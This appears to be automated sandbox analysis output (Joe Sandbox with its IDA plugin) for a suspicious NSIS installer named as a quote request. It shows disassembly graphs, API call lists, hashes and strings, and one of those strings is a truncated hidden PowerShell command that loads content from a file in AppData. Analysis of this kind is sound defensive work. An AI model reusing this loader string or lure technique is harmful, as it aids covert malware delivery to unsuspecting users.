                                                      • GetWindowsDirectoryW.KERNEL32(: Completed,00000400), ref: 00406190
                                                      • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004061CC
                                                      • SHGetPathFromIDListW.SHELL32(?,: Completed), ref: 004061DA
                                                      • CoTaskMemFree.OLE32(?), ref: 004061E5
                                                      • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406209
                                                      • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004051B0,Completed,00000000,00000000,0040FEA0), ref: 00406263
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                      • String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                      • API String ID: 900638850-905382516
                                                      • Opcode ID: 52b5c989bfcfa41031e69e9bc1b01fc817c5fcaa4102b2eac78cc44a12febbb5
                                                      • Instruction ID: f6a8a8a7a7034b932088a9542e42f1195f789c387e9fc15d08c952313e2c7fd4
                                                      • Opcode Fuzzy Hash: 52b5c989bfcfa41031e69e9bc1b01fc817c5fcaa4102b2eac78cc44a12febbb5
                                                      • Instruction Fuzzy Hash: 5C612671A00105EBDF209F64CC40AAE37A5BF51314F52817FE916BA2E1D73D8AA2CB5D

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 490 401767-40178c call 402bbf call 405a45 495 401796-4017a8 call 40601a call 4059ce lstrcatW 490->495 496 40178e-401794 call 40601a 490->496 501 4017ad-4017ae call 4062ae 495->501 496->501 505 4017b3-4017b7 501->505 506 4017b9-4017c3 call 40635d 505->506 507 4017ea-4017ed 505->507 514 4017d5-4017e7 506->514 515 4017c5-4017d3 CompareFileTime 506->515 508 4017f5-401811 call 405bef 507->508 509 4017ef-4017f0 call 405bca 507->509 517 401813-401816 508->517 518 401885-4018ae call 405179 call 403027 508->518 509->508 514->507 515->514 519 401867-401871 call 405179 517->519 520 401818-401856 call 40601a * 2 call 40603c call 40601a call 40575f 517->520 530 4018b0-4018b4 518->530 531 4018b6-4018c2 SetFileTime 518->531 532 40187a-401880 519->532 520->505 552 40185c-40185d 520->552 530->531 534 4018c8-4018d3 CloseHandle 530->534 531->534 535 402a55 532->535 539 4018d9-4018dc 534->539 540 402a4c-402a4f 534->540 538 402a57-402a5b 535->538 542 4018f1-4018f4 call 40603c 539->542 543 4018de-4018ef call 40603c lstrcatW 539->543 540->535 549 4018f9-40228d call 40575f 542->549 543->549 549->538 549->540 552->532 554 40185f-401860 552->554 554->519
                                                      APIs
                                                      • lstrcatW.KERNEL32(00000000,00000000,"powershell.exe" -windowstyle minimized "$Ketonizes=Get-Content -Raw 'C:\Users\user\AppData\Roaming\thrombopenia\Udansk.man';$St,C:\Users\user\AppData\Roaming\thrombopenia\Clothesbag25,?,?,00000031), ref: 004017A8
                                                      • CompareFileTime.KERNEL32(-00000014,?,"powershell.exe" -windowstyle minimized "$Ketonizes=Get-Content -Raw 'C:\Users\user\AppData\Roaming\thrombopenia\Udansk.man';$St,"powershell.exe" -windowstyle minimized "$Ketonizes=Get-Content -Raw 'C:\Users\user\AppData\Roaming\thrombopenia\Udansk.man';$St,00000000,00000000,"powershell.exe" -windowstyle minimized "$Ketonizes=Get-Content -Raw 'C:\Users\user\AppData\Roaming\thrombopenia\Udansk.man';$St,C:\Users\user\AppData\Roaming\thrombopenia\Clothesbag25,?,?,00000031), ref: 004017CD
                                                        • Part of subcall function 0040601A: lstrcpynW.KERNEL32(?,?,00000400,00403317,00428200,NSIS Error), ref: 00406027
                                                        • Part of subcall function 00405179: lstrlenW.KERNEL32(Completed,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B1
                                                        • Part of subcall function 00405179: lstrlenW.KERNEL32(00403160,Completed,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C1
                                                        • Part of subcall function 00405179: lstrcatW.KERNEL32(Completed,00403160,00403160,Completed,00000000,0040FEA0,00000000), ref: 004051D4
                                                        • Part of subcall function 00405179: SetWindowTextW.USER32(Completed,Completed), ref: 004051E6
                                                        • Part of subcall function 00405179: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040520C
                                                        • Part of subcall function 00405179: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405226
                                                        • Part of subcall function 00405179: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405234
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                      • String ID: "powershell.exe" -windowstyle minimized "$Ketonizes=Get-Content -Raw 'C:\Users\user\AppData\Roaming\thrombopenia\Udansk.man';$St$C:\Users\user\AppData\Roaming\thrombopenia\Clothesbag25$modarbejdelsen\kipchak
                                                      • API String ID: 1941528284-3659941877
                                                      • Opcode ID: 98617149d2a197177459ef23d6ac5abc8cc87d3de3c007345ed02b250cccfea8
                                                      • Instruction ID: c9b8be7f26e3bb8f886377ec20d84860bb913b523593c9fc4340e73ed15d4a17
                                                      • Opcode Fuzzy Hash: 98617149d2a197177459ef23d6ac5abc8cc87d3de3c007345ed02b250cccfea8
                                                      • Instruction Fuzzy Hash: 0041D531900114FACF20BFB5CC45EAE3A79EF45369B20423BF022B10E2D73C8A119A6D

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 556 405179-40518e 557 405194-4051a5 556->557 558 405245-405249 556->558 559 4051b0-4051bc lstrlenW 557->559 560 4051a7-4051ab call 40603c 557->560 561 4051d9-4051dd 559->561 562 4051be-4051ce lstrlenW 559->562 560->559 565 4051ec-4051f0 561->565 566 4051df-4051e6 SetWindowTextW 561->566 562->558 564 4051d0-4051d4 lstrcatW 562->564 564->561 567 4051f2-405234 SendMessageW * 3 565->567 568 405236-405238 565->568 566->565 567->568 568->558 569 40523a-40523d 568->569 569->558
                                                      APIs
                                                      • lstrlenW.KERNEL32(Completed,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B1
                                                      • lstrlenW.KERNEL32(00403160,Completed,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C1
                                                      • lstrcatW.KERNEL32(Completed,00403160,00403160,Completed,00000000,0040FEA0,00000000), ref: 004051D4
                                                      • SetWindowTextW.USER32(Completed,Completed), ref: 004051E6
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040520C
                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405226
                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405234
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                      • String ID: Completed
                                                      • API String ID: 2531174081-3087654605
                                                      • Opcode ID: f0736de6b77852687f6af56d99953fc3f04ffb9a82c0cfa673b58ad5bb6d8165
                                                      • Instruction ID: 28a23e93becb388afe58fbbf22e110c81461cbae08fd60e06f08ac54b892b673
                                                      • Opcode Fuzzy Hash: f0736de6b77852687f6af56d99953fc3f04ffb9a82c0cfa673b58ad5bb6d8165
                                                      • Instruction Fuzzy Hash: 3C218E31900158BBCB219F95DD84ADFBFB8EF55350F10807AF904B62A0C7794A518F68

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 570 406384-4063a4 GetSystemDirectoryW 571 4063a6 570->571 572 4063a8-4063aa 570->572 571->572 573 4063bb-4063bd 572->573 574 4063ac-4063b5 572->574 575 4063be-4063f1 wsprintfW LoadLibraryExW 573->575 574->573 576 4063b7-4063b9 574->576 576->575
                                                      APIs
                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040639B
                                                      • wsprintfW.USER32 ref: 004063D6
                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004063EA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                      • String ID: %s%S.dll$UXTHEME$\
                                                      • API String ID: 2200240437-1946221925
                                                      • Opcode ID: 593f7811ea388f5a47145f6632eb7b382babc1da37006913c6aa5b6fd682aae8
                                                      • Instruction ID: 69ae2dd3acfd93707f2d49264f8241546f9c5af57f384429b5f7a638f8549ddd
                                                      • Opcode Fuzzy Hash: 593f7811ea388f5a47145f6632eb7b382babc1da37006913c6aa5b6fd682aae8
                                                      • Instruction Fuzzy Hash: 6BF0B170910119A7DF14A764DC0DF9B366CA700744F604476AA07F11D1EB7CEB65C7E9

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 577 403027-40303e 578 403040 577->578 579 403047-40304f 577->579 578->579 580 403051 579->580 581 403056-40305b 579->581 580->581 582 40306b-403078 call 40320c 581->582 583 40305d-403066 call 403222 581->583 587 4031c3 582->587 588 40307e-403082 582->588 583->582 591 4031c5-4031c6 587->591 589 403088-4030a8 GetTickCount call 406513 588->589 590 4031ac-4031ae 588->590 601 403202 589->601 603 4030ae-4030b6 589->603 592 4031b0-4031b3 590->592 593 4031f7-4031fb 590->593 595 403205-403209 591->595 596 4031b5 592->596 597 4031b8-4031c1 call 40320c 592->597 598 4031c8-4031ce 593->598 599 4031fd 593->599 596->597 597->587 610 4031ff 597->610 604 4031d0 598->604 605 4031d3-4031e1 call 40320c 598->605 599->601 601->595 607 4030b8 603->607 608 4030bb-4030c9 call 40320c 603->608 604->605 605->587 614 4031e3-4031ef call 405ca1 605->614 607->608 608->587 615 4030cf-4030d8 608->615 610->601 619 4031f1-4031f4 614->619 620 4031a8-4031aa 614->620 618 4030de-4030fb call 406533 615->618 623 403101-403118 GetTickCount 618->623 624 4031a4-4031a6 618->624 619->593 620->591 625 403163-403165 623->625 626 40311a-403122 623->626 624->591 629 403167-40316b 625->629 630 403198-40319c 625->630 627 403124-403128 626->627 628 40312a-40315b MulDiv wsprintfW call 405179 626->628 627->625 627->628 635 403160 628->635 632 403180-403186 629->632 633 40316d-403172 call 405ca1 629->633 630->603 634 4031a2 630->634 637 40318c-403190 632->637 638 403177-403179 633->638 634->601 635->625 637->618 639 403196 637->639 638->620 640 40317b-40317e 638->640 639->601 640->637
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: CountTick$wsprintf
                                                      • String ID: ... %d%%
                                                      • API String ID: 551687249-2449383134
                                                      • Opcode ID: 684f5030c79bc3ddb9bb75536ee51c67afbd92a3f7865a882cb7187bdb02bce5
                                                      • Instruction ID: d56137d6e4a505209b2495a9ad0e903af7b2eaecc34ac4602261a913104377f3
                                                      • Opcode Fuzzy Hash: 684f5030c79bc3ddb9bb75536ee51c67afbd92a3f7865a882cb7187bdb02bce5
                                                      • Instruction Fuzzy Hash: 95517A71900219ABCB10CF65D944BAF3FA8AB08766F14457BE911BB2C1C7789E50CBED

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 641 405c1e-405c2a 642 405c2b-405c5f GetTickCount GetTempFileNameW 641->642 643 405c61-405c63 642->643 644 405c6e-405c70 642->644 643->642 645 405c65 643->645 646 405c68-405c6b 644->646 645->646
                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 00405C3C
                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exe",00403268,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00405C57
                                                      Strings
                                                      • nsa, xrefs: 00405C2B
                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C23
                                                      • "C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exe", xrefs: 00405C1E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: CountFileNameTempTick
                                                      • String ID: "C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                      • API String ID: 1716503409-3040770719
                                                      • Opcode ID: b475e38dea5fb3e2c0bd2ffad844489a64f4d901e003652483f57aed9986a0af
                                                      • Instruction ID: a4e54dcc62cd1b6bfc855809a1f33464b5edbff741e4ba4f72954512b04b2574
                                                      • Opcode Fuzzy Hash: b475e38dea5fb3e2c0bd2ffad844489a64f4d901e003652483f57aed9986a0af
                                                      • Instruction Fuzzy Hash: 58F09076B04204BBEB009F5ADD49ADFB7ACEB91710F10403AF900E7190E2B0AE44CB64

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 647 40237b-4023c1 call 402cb4 call 402bbf * 2 RegCreateKeyExW 654 4023c7-4023cf 647->654 655 402a4c-402a5b 647->655 657 4023d1-4023de call 402bbf lstrlenW 654->657 658 4023e2-4023e5 654->658 657->658 661 4023f5-4023f8 658->661 662 4023e7-4023f4 call 402ba2 658->662 664 402409-40241d RegSetValueExW 661->664 665 4023fa-402404 call 403027 661->665 662->661 669 402422-4024fc RegCloseKey 664->669 670 40241f 664->670 665->664 669->655 670->669
                                                      APIs
                                                      • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                      • lstrlenW.KERNEL32(0040A5A8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                      • RegSetValueExW.ADVAPI32(?,?,?,?,0040A5A8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                      • RegCloseKey.ADVAPI32(?,?,?,0040A5A8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateValuelstrlen
                                                      • String ID:
                                                      • API String ID: 1356686001-0
                                                      • Opcode ID: 9c3560047bf81b060649ab2ba7fae034fea2e254797de55e48abe939b4ee199e
                                                      • Instruction ID: 604b722b9c55a9196ccdb8bc5d46c0fd7c9d49ef9fceb37282f2360b7a100841
                                                      • Opcode Fuzzy Hash: 9c3560047bf81b060649ab2ba7fae034fea2e254797de55e48abe939b4ee199e
                                                      • Instruction Fuzzy Hash: 1B11AE71E00108BFEB10AFA4DE89EAE767CEB54358F10403AF904B61D1D6B85E419628

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 672 401e66-401e77 call 402bbf call 405179 call 4056fa 678 401e7c-401e81 672->678 679 401e87-401e8a 678->679 680 40281e-402825 678->680 681 401edb-401ee4 CloseHandle 679->681 682 401e8c-401e9c WaitForSingleObject 679->682 683 402a4c-402a5b 680->683 681->683 685 401eac-401eae 682->685 687 401eb0-401ec0 GetExitCodeProcess 685->687 688 401e9e-401eaa call 406430 WaitForSingleObject 685->688 690 401ec2-401ecd call 405f61 687->690 691 401ecf-401ed2 687->691 688->685 690->681 691->681 694 401ed4 691->694 694->681
                                                      APIs
                                                        • Part of subcall function 00405179: lstrlenW.KERNEL32(Completed,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B1
                                                        • Part of subcall function 00405179: lstrlenW.KERNEL32(00403160,Completed,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C1
                                                        • Part of subcall function 00405179: lstrcatW.KERNEL32(Completed,00403160,00403160,Completed,00000000,0040FEA0,00000000), ref: 004051D4
                                                        • Part of subcall function 00405179: SetWindowTextW.USER32(Completed,Completed), ref: 004051E6
                                                        • Part of subcall function 00405179: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040520C
                                                        • Part of subcall function 00405179: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405226
                                                        • Part of subcall function 00405179: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405234
                                                        • Part of subcall function 004056FA: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004256F0,Error launching installer), ref: 00405723
                                                        • Part of subcall function 004056FA: CloseHandle.KERNEL32(?), ref: 00405730
                                                      • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                      • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                      • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                      • String ID:
                                                      • API String ID: 3585118688-0
                                                      • Opcode ID: 69b5820343fa7919536da53fe2883c706938cc98ec35380d784e7e4dd2bf9d24
                                                      • Instruction ID: 19c395d66568059f601410a6cc42e832bf6643a8327f7d33ffb52a85e02cf26d
                                                      • Opcode Fuzzy Hash: 69b5820343fa7919536da53fe2883c706938cc98ec35380d784e7e4dd2bf9d24
                                                      • Instruction Fuzzy Hash: FF11A131900108EBCF21AFA1CC849DE7A76EB44314F204037F605B61E1C7798E81DB9E

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 779 4015b9-4015cd call 402bbf call 405a79 784 401629-40162c 779->784 785 4015cf-4015e2 call 4059fb 779->785 787 40165b-4021e1 call 401423 784->787 788 40162e-40164d call 401423 call 40601a SetCurrentDirectoryW 784->788 794 4015e4-4015e7 785->794 795 4015fc-4015ff call 4056c5 785->795 803 402a4c-402a5b 787->803 804 40281e-402825 787->804 788->803 807 401653-401656 788->807 794->795 796 4015e9-4015f0 call 4056e2 794->796 802 401604-401606 795->802 796->795 811 4015f2-4015fa call 405648 796->811 808 401608-40160d 802->808 809 40161f-401627 802->809 804->803 807->803 812 40161c 808->812 813 40160f-40161a GetFileAttributesW 808->813 809->784 809->785 811->802 812->809 813->809 813->812
                                                      APIs
                                                        • Part of subcall function 00405A79: CharNextW.USER32(?,?,00424EF0,?,00405AED,00424EF0,00424EF0, 4Wu,?,C:\Users\user\AppData\Local\Temp\,0040582B,?,75573420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A87
                                                        • Part of subcall function 00405A79: CharNextW.USER32(00000000), ref: 00405A8C
                                                        • Part of subcall function 00405A79: CharNextW.USER32(00000000), ref: 00405AA4
                                                      • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612
                                                        • Part of subcall function 00405648: CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040568B
